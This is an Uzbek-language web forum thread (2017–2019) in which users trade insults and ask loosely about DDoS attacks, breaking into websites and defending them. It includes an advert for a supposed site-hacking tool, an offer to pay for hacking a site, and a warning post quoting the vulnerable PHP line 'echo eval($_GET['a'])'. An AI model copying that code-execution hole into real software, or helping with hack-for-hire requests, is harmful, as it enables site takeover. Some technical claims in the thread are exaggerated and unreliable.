Ishonchni oqlamadi shekilli? :D RARE (14 Dec 2017 22:53) Chala hackerlar jonga tegdi uzidan hacker yasab olganlar Forumdosh (14 Dec 2017 22:54) --Javob-- Ashurov (14 Dec 2017 22:50): Forumdosh, Sizga ham birta link bervoraymi ha mayli mana [url=http://uzmasters.ru]http://fruden.ml[/url] kiring ---------- Fruden, Rahmat,parolimni unutay debman. :D
Ashurov (14 Dec 2017 22:56) --Javob-- Forumdosh (14 Dec 2017 22:51): Fruden, off uchun uzr.
Siz ishonch bildirgan Cracker_Boy midi? :D
Spammer Group :D
Chatga qarang :D
Ishonchni oqlamadi shekilli? :D ---------- Forumdosh, Balkim menga frbgarlik qilmagan unda pulim qolib ketmagan, chata oqib chiqdimu tushunmadim shxga nima bolganini yozing iltimos faqat toliq nega ogabek doston sokinyapti siz va viruzbeklar umuman tushunmadim
P/S serfimeni haker ekanligini isbotlang, 500wmrni gap qilamiz nishonlaymiz :D NafisGroup (14 Dec 2017 22:56) --Javob-- RARE (14 Dec 2017 22:53): Chala hackerlar jonga tegdi uzidan hacker yasab olganlar ---------- RARE, senda usha chalamaslik bormi ular chala haker bosa sen chalaodamsanku :kozz: kimbosangham odam bo .oldin ozinga boq kein nogora qoq degan sozlardan habaring bormi .bu sozlarni mag'zini chaqib ol RARE (14 Dec 2017 23:01) --Javob-- NafisGroup (14 Dec 2017 22:56): RARE, senda usha chalamaslik bormi ular chala haker bosa sen chalaodamsanku :kozz: kimbosangham odam bo .oldin ozinga boq kein nogora qoq degan sozlardan habaring bormi .bu sozlarni mag'zini chaqib ol ---------- NafisGroup, mazang joyidami uzingni uqitib ol,oldinga borsam gapinga javob berolasanmi ? NafisGroup (14 Dec 2017 23:03) --Javob-- RARE (14 Dec 2017 23:01): NafisGroup, mazang joyidami uzingni uqitib ol,oldinga borsam gapinga javob berolasanmi ? ---------- RARE, zorsanda chala odam bolib kelaman deysanmi gapinga javob beraolmisan gapirgan gapingga olaymi.kaliningradka kel koraik RARE (14 Dec 2017 23:04) --Javob-- NafisGroup (14 Dec 2017 22:56): RARE, senda usha chalamaslik bormi ular chala haker bosa sen chalaodamsanku :kozz: kimbosangham odam bo .oldin ozinga boq kein nogora qoq degan sozlardan habaring bormi .bu sozlarni mag'zini chaqib ol ---------- NafisGroup, senga hackerlik ko'rsatsam o'zingni yuqotib shokga tushib qolmaysanmi chala hacker :voy: :voy: ScarPion (14 Dec 2017 23:06) --Javob-- RARE (14 Dec 2017 23:04): NafisGroup, senga hackerlik ko'rsatsam o'zingni yuqotib shokga tushib qolmaysanmi chala hacker :voy: :voy: ---------- RARE, saytizni nomini yozinda RARE (14 Dec 2017 23:06) --Javob-- NafisGroup (14 Dec 2017 23:03): RARE, zorsanda chala odam bolib kelaman deysanmi gapinga javob beraolmisan gapirgan gapingga olaymi.kaliningradka kel koraik ---------- NafisGroup, sendaqa itlaga yozish jalka vaqt chala miyangni chala qismi ishlamydi seni bir so'z bilan aytganda to'nkadan farqing yuq.Qolgani shx senga NafisGroup (14 Dec 2017 23:07) --Javob-- Ashurov (14 Dec 2017 22:56): Forumdosh, Balkim menga frbgarlik qilmagan unda pulim qolib ketmagan, chata oqib chiqdimu tushunmadim shxga nima bolganini yozing iltimos faqat toliq nega ogabek doston sokinyapti siz va viruzbeklar umuman tushunmadim
P/S serfimeni haker ekanligini isbotlang, 500wmrni gap qilamiz nishonlaymiz :D ---------- Fruden, men isbotlay .en uzimni haker demaganman umuman odiy foydalanuvchiman sizlarga ohshab RARE (14 Dec 2017 23:08) --Javob-- ScarPion (14 Dec 2017 23:06): RARE, saytizni nomini yozinda ---------- ScarPion, tushunmadim ScarPion (14 Dec 2017 23:08) --Javob-- RARE (14 Dec 2017 23:08): ScarPion, tushunmadim ---------- RARE, saytiz bosa nomini yozin didim NafisGroup (14 Dec 2017 23:10) --Javob-- RARE (14 Dec 2017 23:06): NafisGroup, sendaqa itlaga yozish jalka vaqt chala miyangni chala qismi ishlamydi seni bir so'z bilan aytganda to'nkadan farqing yuq.Qolgani shx senga ---------- RARE, karg'aga ohshama qarqar deysanmi? senda pam bormi uzi RARE (14 Dec 2017 23:13) --Javob-- ScarPion (14 Dec 2017 23:08): RARE, saytiz bosa nomini yozin didim ---------- ScarPion, shxga yozdim RARE (14 Dec 2017 23:14) --Javob-- NafisGroup (14 Dec 2017 23:10): RARE, karg'aga ohshama qarqar deysanmi? senda pam bormi uzi ---------- NafisGroup, senga 3 ta harf suqma qoshigingni hamma joyga ham suqaverma pand yeyib qolma yana ScarPion (14 Dec 2017 23:16) duxini qaraya :joy: :joy: :joy: NafisGroup (14 Dec 2017 23:17) --Javob-- RARE (14 Dec 2017 23:14): NafisGroup, senga 3 ta harf suqma qoshigingni hamma joyga ham suqaverma pand yeyib qolma yana ---------- RARE, paming eshakni amibilan birhil ekan gab yoq CHALA ODAM RARE (14 Dec 2017 23:20) Yozganlarim kimga tegishli ekani va qanaqa ekanliklaringni isbotlab bulidirang isbotga ne hojat :zor:
ps/Aqli yuq hayvonlarga vaqt ajratishga vaqt yuq ScarPion (14 Dec 2017 23:22) --Javob-- RARE (14 Dec 2017 23:20): Yozganlarim kimga tegishli ekani va qanaqa ekanliklaringni isbotlab bulidirang isbotga ne hojat :zor:
ps/Aqli yuq hayvonlarga vaqt ajratishga vaqt yuq ---------- RARE, togri aytasan sanga vaqt ajratmimiz :joy: :joy: :joy: :joy: Devirgind (18 Dec 2017 02:39) Dos hujim haqida malumot kerag ? Devirgind (18 Dec 2017 02:40) Saytga verus qanday tashasa buladi ? Kungaboqar (16 Mar 2018 14:27) Ddos hujumini saytga qanday tasir qiladi qotadimi sayt Besthakker (16 Mar 2018 15:43) Saytlarga qanaqa qilib hujum qilinadi va qaysi papka infiles papkasiga hujum qimidimi WaP_MaSTeR (17 Mar 2018 12:45) Yaqinda bitta bez nik chatga kirib olib sadaqa sörab bowimni og'ritib yubordi ddos tawiman deb ddos tawasa nima boladi malumot berib yuboring BLACK_LION (17 Mar 2018 12:48) --Javob-- WaP_MaSTeR (17 Mar 2018 12:45): Yaqinda bitta bez nik chatga kirib olib sadaqa sörab bowimni og'ritib yubordi ddos tawiman deb ddos tawasa nima boladi malumot berib yuboring ---------- shahzod, ddos bu saytga bur vaqtning o'zida ddos sifatiga qarab, unga bo'lgan so'rovni oshirish. Ashurov (17 Mar 2018 13:14) --Javob-- Kungaboqar (16 Mar 2018 14:27): Ddos hujumini saytga qanday tasir qiladi qotadimi sayt ---------- Kungaboqar, Boshida qotadi, agar so'rovlar ko'payib ketsa, sayt ishlamay qoladi, hosting adminlari, server ustalari saytingizni vaqtinchalik yoki butunlay yopib qo'yishadi Ashurov (17 Mar 2018 13:16) --Javob-- Devirgind (18 Dec 2017 02:39): Dos hujim haqida malumot kerag ? ---------- Devirgind, Wikipedia va googledan qidiring, ma'lumotlar bor... Bexruzchik (25 Mar 2018 15:23) --Javob-- Devirgind (18 Dec 2017 02:39): Dos hujim haqida malumot kerag ? ---------- Devirgind, ddos hujumi notugri surovlar qayta qayta yuborilishi oqibatida kelib chiqadi Black_Xaker (13 Oct 2018 13:59) Yana qanday yullar bilan saytni himoya qisa buladi Bugun (13 Oct 2018 14:02) Yomon hujum bo'ladi ZafarHayitoglu (14 Oct 2018 07:41) Bizani saytlarga hujum ham bo`lmasa kerak. Reyting juda past... MasterOS (14 Oct 2018 15:58) [b]Jamshid4ik,[/b] Saytni qanchalik himoya qilmang hujum qilaman degan odam hujum qiladi.Masalan githubni ko'ring xitoyliklar sekundiga 1200 terabayt ddos qilib saytni ishdan chiqarishdi. UmA (14 Oct 2018 17:06) Sayt qancha mashxur bo'lsa uni shuncha himoyasiga yopishish kerak. Bu yerda muhokama qilganimiz bilan birov saytimizni kelib himoyalab ketmaydi. Bu yerdagi postlardan ham foyda yo'q, hammasini ma'nosi bir hil. (Buni bizdan katta masterlar ham muhokama qilishgan.) ScarPion (14 Oct 2018 19:31) himoyalash qiyinmas lekin unutmaslik kerak inson qo'li bilan yaratilgan barcha narsani buzish mumkin Tayotabek (14 Oct 2018 19:53) [b]MasterOS,[/b] sekundiga 1200 terabayt ddos qilib
.
Döst mana shetiga tushunmadimda:gy:
qanaqasiga, qanday hisoblanyapti sekuntiga shuncha terabayt, ddos (mendagi tushuncha soxta host) bir sahifaga millionlab soxta user kirishi deb tushunaman. Ammo 1200 terabayt... :nima: !? ScarPion (14 Oct 2018 20:20) --Javob-- MasterOS (14 Oct 2018 15:58): [b]Jamshid4ik,[/b] Saytni qanchalik himoya qilmang hujum qilaman degan odam hujum qiladi.Masalan githubni ko'ring xitoyliklar sekundiga 1200 terabayt ddos qilib saytni ishdan chiqarishdi. ---------- [b]MasterOS,[/b] maza qilib kuldim :joy: Diamond (14 Oct 2018 20:26) --Javob-- ScarPion (14 Oct 2018 20:20): [b]MasterOS,[/b] maza qilib kuldim :joy: ---------- [b]ScarPion,[/b] Bu akamiz "Hozir bu axmoqlarni boplab laqillataman" deb o'ylab tavakkaliga aytvordilar menimcha :joy: ScarPion (14 Oct 2018 20:51) --Javob-- Diamond (14 Oct 2018 20:26): [b]ScarPion,[/b] Bu akamiz "Hozir bu axmoqlarni boplab laqillataman" deb o'ylab tavakkaliga aytvordilar menimcha :joy: ---------- [b]Diamond,[/b] sekundiga 1200 tera :joy: 2500-yilda ham bunday tezlikni orzu qilishadi MasterOS (14 Oct 2018 23:11) [b]ScarPion,[/b] 1200 terabayt divoribman.1.200 gigabayt orniga 1200 gb=1 terabayt
[b]4288dan so'ng qo'shdi...[/b]
[b]Diamond,[/b] 1 terabayt orniga 1200 terabayt yozvorbman.Ishonmasayiz githubni texniklarini emailiga inglizcha xabar yozib so'rab ko'ring.Menga shunday javob berishdi hujum 10 soniya davom etgan.Soniyasiga 1 terabayt so'rov jo'natilgan.Ddos Chinadan bo'ldi deyishdi ScarPion (14 Oct 2018 23:51) --Javob-- MasterOS (14 Oct 2018 23:11): [b]ScarPion,[/b] 1200 terabayt divoribman.1.200 gigabayt orniga 1200 gb=1 terabayt
[b]4288dan so'ng qo'shdi...[/b]
[b]Diamond,[/b] 1 terabayt orniga 1200 terabayt yozvorbman.Ishonmasayiz githubni texniklarini emailiga inglizcha xabar yozib so'rab ko'ring.Menga shunday javob berishdi hujum 10 soniya davom etgan.Soniyasiga 1 terabayt so'rov jo'natilgan.Ddos Chinadan bo'ldi deyishdi ---------- [b]MasterOS,[/b] unda texnikla axmoq ekan :joy: :joy: BLACK_LION (15 Oct 2018 05:08) --Javob-- MasterOS (14 Oct 2018 23:11): [b]ScarPion,[/b] 1200 terabayt divoribman.1.200 gigabayt orniga 1200 gb=1 terabayt
[b]4288dan so'ng qo'shdi...[/b]
[b]Diamond,[/b] 1 terabayt orniga 1200 terabayt yozvorbman.Ishonmasayiz githubni texniklarini emailiga inglizcha xabar yozib so'rab ko'ring.Menga shunday javob berishdi hujum 10 soniya davom etgan.Soniyasiga 1 terabayt so'rov jo'natilgan.Ddos Chinadan bo'ldi deyishdi ---------- [b]MasterOS,[/b] 1024 Gb - 1 Tb.
.
.
Õsha emailini beringchi?
[b]42 sekunddan so'ng qo'shdi...[/b]
[b]Tayotabek,[/b] Siz hostni kõtarishni ddos deb õylaysizmi? U siz õylagandek oddiy narsa emas! MasterOS (15 Oct 2018 10:58) [b]Bahh Tee,[/b] Mana support@github.com
noreply@github.com
@github.com
support@github.io Diamond (18 Oct 2018 21:33) --Javob-- BLACK_LION (15 Oct 2018 05:08): [b]MasterOS,[/b] 1024 Gb - 1 Tb.
.
.
Õsha emailini beringchi?
[b]42 sekunddan so'ng qo'shdi...[/b]
[b]Tayotabek,[/b] Siz hostni kõtarishni ddos deb õylaysizmi? U siz õylagandek oddiy narsa emas! ---------- [b]Bahh Tee,[/b] Ddos nima unda? fokuschi (18 Oct 2018 22:01) --Javob-- Diamond (18 Oct 2018 21:33): [b]Bahh Tee,[/b] Ddos nima unda? ---------- [b]Diamond,[/b] Saytga juda ko'p nato'g'ri so'rov jo'natish Diamond (18 Oct 2018 22:05) --Javob-- fokuschi (18 Oct 2018 22:01): [b]Diamond,[/b] Saytga juda ko'p nato'g'ri so'rov jo'natish ---------- [b]fokuschi,[/b] To'g'ri so'rovchi? Yani Juda ko'p to'g'ri so'rov. ? fokuschi (18 Oct 2018 22:43) --Javob-- Diamond (18 Oct 2018 22:05): [b]fokuschi,[/b] To'g'ri so'rovchi? Yani Juda ko'p to'g'ri so'rov. ? ---------- [b]Diamond,[/b] Bilmadim ScarPion (18 Oct 2018 22:49) o'rganib qo'ysela zarar qimidi REYXAN (19 Oct 2018 10:24) Bu yerda hujum qilishni o'rganamizmi :nima: KING_001 (19 Oct 2018 11:07) Bu bo'limda mavzu ochishingiz uchun sizda forumdagi xabarlar soni 50 tadan oshiq bo'lishi shart, hozirda sizda 42 ta xabar mavjud RM_FANAT (2 Feb 2019 16:14) Misol: Saytda dirka bor.!, Lekin sayt ssl sertifikatlangan, Saytni buzib bo`ladimi.??? Sanjar07 (2 Feb 2019 16:19) [b]RM_FANAT,[/b] Hoh ishonin hoh yoq bu dirka dirkaga qarshi hich narsa qb bolmaydi. Fm ni udalit qsez ham dirka qoluradi ochmas virus kabi. OZiz oylen dirka bilan saytda hech narsa qoldirmaydi baza ga cha kirib boradi dgan gap ham bor bunisi rost mi bilmayman lekin xozirgi gaplarim rost. Quvnoqfm ni scriptini sotvoganimda bildm ichi tola dirkaligini va uni hech narsasini olmadm.ozi qaysi scriptni qoygandiz MirPro (2 Feb 2019 19:29) [b]Sanjar07,[/b] Forumdosh Oldin "Dirka,Shell" va hokozo lar xaqida ma‘lumotka ega bo‘lish kerek!
Dirkaga qarshi xech nima qib bo‘miydimas bo‘ladi xatoni topish va yopish bo‘ldi sodda va lo‘nda :koz:
[b]188dan so'ng qo'shdi...[/b]
[b]RM_FANAT,[/b]Ssl sertifikat damen sertifikati xisoblanadi bu saytdegi fayllar kantentiga mutloqo aloqasi yo‘q! ScarPion (3 Feb 2019 03:19) --Javob-- Sanjar07 (2 Feb 2019 16:19): [b]RM_FANAT,[/b] Hoh ishonin hoh yoq bu dirka dirkaga qarshi hich narsa qb bolmaydi. Fm ni udalit qsez ham dirka qoluradi ochmas virus kabi. OZiz oylen dirka bilan saytda hech narsa qoldirmaydi baza ga cha kirib boradi dgan gap ham bor bunisi rost mi bilmayman lekin xozirgi gaplarim rost. Quvnoqfm ni scriptini sotvoganimda bildm ichi tola dirkaligini va uni hech narsasini olmadm.ozi qaysi scriptni qoygandiz ---------- [b]Sanjar07,[/b] :joy: :joy: :joy: :joy: ibtidoiy davrda shunday edi hozi XXI asr dirkani yopish problema emas TADJIKISTANES (3 Feb 2019 08:14) --Javob-- RM_FANAT (2 Feb 2019 16:14): Misol: Saytda dirka bor.!, Lekin sayt ssl sertifikatlangan, Saytni buzib bo`ladimi.??? ---------- [b]RM_FANAT,[/b] SSL domen uchun sayt fayllari uchunmas
Xatosi togirlanmasa buzip ketoradi UzNetStar (22 May 2019 17:24) salom hamaga
[b]29 sekunddan so'ng qo'shdi...[/b]
larkda ochilgan saytimni qanday ddosdan himoya qilsam bo`ladi :joy: SEVIMLI (22 May 2019 17:57) larkdagi saytlani qanday qilib osongina buzish mumkin? RM_FANAT (22 May 2019 18:05) Saytlarni qanday vzlom qisa bo'ladi? khan (22 May 2019 18:12) [b]RM_FANAT,[/b] Orgateme tg bormi. Manga yozvorsez videolarni taweman korvolas. :koz: RM_FANAT (22 May 2019 18:14) --Javob-- khan (22 May 2019 18:12): [b]RM_FANAT,[/b] Orgateme tg bormi. Manga yozvorsez videolarni taweman korvolas. :koz: ---------- [b]khan,[/b] Tg yoq, lekin sh.x bor Tayotabek (22 May 2019 18:26) Mavzu nomi va mazmuni saytni qanday buzish haqida emas. Davvom etsa xafa bòlish yòq. (Ogohlantiruv) BiG_ViRuS (22 May 2019 18:49) Mavzuni boshidan Oxirigacha o'qib chiqdim. Haqqatanam umuman bir kerayli ma'lumot yuq. Saytni himoyalash haqida o'rgatinglar undan ko'ra. Biror kod bormi masalan himoya uchun. Yoki scrptni qande tozalasa boladi shell dirka balo battarladan hullas:) MasterOS (22 May 2019 22:02) Sababi buzgan odamlar malumot yozmaydida :D bek2004 (21 Nov 2019 19:55) Qande buzadi saytni MASTER_KHAMRAEV (4 Dec 2019 20:06) Kimda ddos bor buzgunchila😕 Udarr (5 Dec 2019 14:12) John cms dagi saytlarni buzadigan va bazaga kiradigan, ddos qiladigan dastur sotiladi. Dasturni angilyalik odam yasagan. Versiyasi 6.2.2 gacha bolgan saytlarni buzoladi. Narxi 800 qiwi. Aloqa sh.x Tayotabek (5 Dec 2019 17:42) --Javob-- Udarr (5 Dec 2019 14:12): John cms dagi saytlarni buzadigan va bazaga kiradigan, ddos qiladigan dastur sotiladi. Dasturni angilyalik odam yasagan. Versiyasi 6.2.2 gacha bolgan saytlarni buzoladi. Narxi 800 qiwi. Aloqa sh.x ---------- [b]Udarr,[/b] Unday dastur yóqligini ózi(miz)ngiz ham yaxshi bilasiz. Lekin oxiriga mazza qib kuld(ik)im 800qiwi 622uchun:lol:

Hurmatli forumdosh forum qoidalari bilan tanishib chiqing. Ogohlantiruv!!! MasterOS (5 Dec 2019 20:01) --Javob-- Udarr (5 Dec 2019 14:12): John cms dagi saytlarni buzadigan va bazaga kiradigan, ddos qiladigan dastur sotiladi. Dasturni angilyalik odam yasagan. Versiyasi 6.2.2 gacha bolgan saytlarni buzoladi. Narxi 800 qiwi. Aloqa sh.x ---------- [b]Udarr,[/b] :D angliyaliklarni ozini cmssi qolib mini wap johncmsdan hujum dastur yasarkanmi? :D pcga topib beraman lekin, organish uchun 2 yil vaqt ketadi, orgatish usuli: hech qanday, orgatilmaydi, mustaqil topasan. MegaTime_Uz (11 Dec 2019 11:34) --Javob-- Udarr (5 Dec 2019 14:12): John cms dagi saytlarni buzadigan va bazaga kiradigan, ddos qiladigan dastur sotiladi. Dasturni angilyalik odam yasagan. Versiyasi 6.2.2 gacha bolgan saytlarni buzoladi. Narxi 800 qiwi. Aloqa sh.x ---------- [b]Udarr,[/b] Johnda ochilgan saytlarni buzib tasherkansizda😂😂😂 MaTeMaTiK (11 Dec 2019 12:48) --Javob-- Udarr (5 Dec 2019 14:12): John cms dagi saytlarni buzadigan va bazaga kiradigan, ddos qiladigan dastur sotiladi. Dasturni angilyalik odam yasagan. Versiyasi 6.2.2 gacha bolgan saytlarni buzoladi. Narxi 800 qiwi. Aloqa sh.x ---------- [b]Udarr,[/b] Man aytgan saytni buzolsangiz 2.5k rubl beraman Tayotabek (22 Dec 2019 01:37) --Javob-- BiG_ViRuS (22 May 2019 18:49): Mavzuni boshidan Oxirigacha o'qib chiqdim. Haqqatanam umuman bir kerayli ma'lumot yuq. Saytni himoyalash haqida o'rgatinglar undan ko'ra. Biror kod bormi masalan himoya uchun. Yoki scrptni qande tozalasa boladi shell dirka balo battarladan hullas:) ---------- Test1
[b]1104dan so'ng qo'shdi...[/b]
Aslida buni yozmoqchimasdim nu
Phpda eval() funksiyasidan extiyot bölish kerak. Agar unga post yoki get ulab qöyilgan bölsa tamom. Evalning vazifasi php kodlarni ishga tushurish. Tabiyki get post larni ulangan bölsa tógridan tögri yöl ochiq:-D
ushbu kod faqat tushuntirish uchun va extiyot bølilar degan maqsatda yozaman qolgani insofingizga bogliq:-)
echo eval($_GET['a']):
get tarzida luboy php kod yozilsa ishlaydi (dirka)
tushungan odam uja tushundi davomi shart emas. Ertaga xakerchalar bosib ketadi:-)
post getlarga kelsak tögri filtrlashni bilsa böldi:-)
evallardan extiyot böling:-)



forumda özidan master va xaker yasavogan(lar) uchun (gap egasini topadi)!
Dirka bn hostingdagi akkauntni ovoladi akauntni log parni ovoladi virus tashash mumkin domeni ulab oladi ubu qisa böladi deb karilavotgan(lar) (gap egasìni topadi)
aqling yetmagan narsalaga aralashib öz fantaziyen qanaqaligini isbotlamay qöyur. Prosta ösha gap ushlavosam ....
[b]52 sekunddan so'ng qo'shdi...[/b]
Sitata böb ketib qobdi uzr))) itifoq (22 Dec 2019 03:03) [b]Tayotabek,[/b] Коп нарсани билармикансиз? Хечким хакерман деганини холи укиганим йо ким айти бизам билаик ким экан у, root (22 Dec 2019 08:32) [b]itifoq,[/b] nega siz qizishasiz?) kerakli va togri malumotni beribdi )
qolaversa hackerlik xaqida davolik xam qilmagan shunchaki buni tori qabul qilish kerak) MasterOS (22 Dec 2019 09:03) Andrax: https://andrax.thecrackertechnology.com MaTeMaTiK (22 Dec 2019 13:45) --Javob-- Tayotabek (22 Dec 2019 01:37): Test1
[b]1104dan so'ng qo'shdi...[/b]
Aslida buni yozmoqchimasdim nu
Phpda eval() funksiyasidan extiyot bölish kerak. Agar unga post yoki get ulab qöyilgan bölsa tamom. Evalning vazifasi php kodlarni ishga tushurish. Tabiyki get post larni ulangan bölsa tógridan tögri yöl ochiq:-D
ushbu kod faqat tushuntirish uchun va extiyot bølilar degan maqsatda yozaman qolgani insofingizga bogliq:-)
echo eval($_GET['a']):
get tarzida luboy php kod yozilsa ishlaydi (dirka)
tushungan odam uja tushundi davomi shart emas. Ertaga xakerchalar bosib ketadi:-)
post getlarga kelsak tögri filtrlashni bilsa böldi:-)
evallardan extiyot böling:-)



forumda özidan master va xaker yasavogan(lar) uchun (gap egasini topadi)!
Dirka bn hostingdagi akkauntni ovoladi akauntni log parni ovoladi virus tashash mumkin domeni ulab oladi ubu qisa böladi deb karilavotgan(lar) (gap egasìni topadi)
aqling yetmagan narsalaga aralashib öz fantaziyen qanaqaligini isbotlamay qöyur. Prosta ösha gap ushlavosam ....
[b]52 sekunddan so'ng qo'shdi...[/b]
Sitata böb ketib qobdi uzr))) ---------- [b]Tayotabek,[/b] Saytga hujum qilishni nech usulini bilasiz? Ulardan necha xil usul bilan himoyalana olasiz? itifoq (22 Dec 2019 14:43) [b]root,[/b] Менга кизиги ким узини хакерман деп айтар экан! менга тогри нотогриси кизикмас, мени редбойс билан адаштиришади. Вообще браузер оркали бузиш мени учун бузушмас, мен бошка нарсалардан фойдаланаман Tayotabek (23 Dec 2019 22:57) --Javob-- itifoq (22 Dec 2019 03:03): [b]Tayotabek,[/b] Коп нарсани билармикансиз? Хечким хакерман деганини холи укиганим йо ким айти бизам билаик ким экан у, ---------- [b]itifoq,[/b] Postimni qayta qayta öqing!
(Gap egasini topadi!)

Qörqmang va xavotir olmay qöyaqoling u siz emas:-) sizni hechkim ushbu mavzuda sen redboys san degani ham yöq.
[b]1 sekunddan so'ng qo'shdi...[/b]
[b]itifoq,[/b] Postimni qayta qayta öqing!
(Gap egasini topadi!)

Qörqmang va xavotir olmay qöyaqoling u siz emas:-) sizni hechkim ushbu mavzuda sen redboys san degani ham yöq. itifoq (24 Dec 2019 02:02) [b]Tayotabek,[/b] Postingizni uzingiz oqing men kim xakerman dedpti shunisi qizik manga dedim sizkabi uzini bilag'on qib korsatuvchilarni kop korganman! meni siz redboys dedingiz deganim yo. Siz aytkan filtr faqat brauzer orqali qilinadigan sorovlardan himoya qiladi, brauzer orqali buzuvchi siz aytkanday hakermas, hakerlar server hostni buza oladiganlargina hisoblanadi boshqasi bu garang qoy holos, men o'zimni mahtab yozmayapman. Men yana birbor kim osha hakerlar ekan shunga qiziqtim Manba: https://www.uzmasters.ru/forum/6/57/1391/